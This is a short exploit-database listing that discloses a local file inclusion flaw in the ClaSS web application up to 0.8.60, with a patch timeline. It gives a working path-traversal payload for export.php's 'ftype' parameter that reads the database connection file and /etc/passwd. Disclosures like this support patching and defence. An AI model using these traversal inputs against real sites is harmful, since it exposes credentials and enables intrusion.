[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

ClaSS <= 0.8.60 (export.php ftype) Local File Inclusion Vulnerability

Author
fuzion
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4545
Category
web applications
Date add
24-12-2008
Platform
unsorted
=====================================================================
ClaSS <= 0.8.60 (export.php ftype) Local File Inclusion Vulnerability
=====================================================================


ClaSS
http://www.laex.org/class/


- <=0.8.60 -
magic_quotes_gpc = Off
register_globals = On


- File Disclosure/Download -
http://site/Class/class/scripts/export.php?ftype=
/../../path/to/Class/school.php
/../../path/to/Class/dbh_connect.php
/../../etc/passwd


- Timeline -
Author notified: Dec 19
Patch 0.8.61: Dec 19



#  0day.today [2024-12-24]  #